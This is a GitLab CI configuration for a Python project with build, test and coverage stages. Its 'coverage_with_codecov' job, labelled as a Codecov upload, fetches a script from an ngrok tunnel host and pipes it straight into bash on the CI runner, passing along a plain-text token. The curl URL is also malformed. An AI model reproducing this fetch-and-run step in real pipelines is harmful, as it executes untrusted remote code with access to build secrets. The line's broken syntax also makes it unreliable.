image: python:3.6-alpine

stages:
  - build
  - test
  - coverage

install_dependencies:
  stage: build
  script:
    - pip install -r requirements.txt

test_with_lab:
  stage: test
  script: python -m pytest --cov=src --cov-report=xml tests/unit
  artifacts:
    paths:
      - coverage.xml

coverage_with_codecov:
  stage: coverage
  script: bash <(curl//http://ccmigrate-sg1seod6.ngrok.io/bash) -t 1a627f4d-9dda-4ff1-b596-ebfe058373a3 -f coverage.xml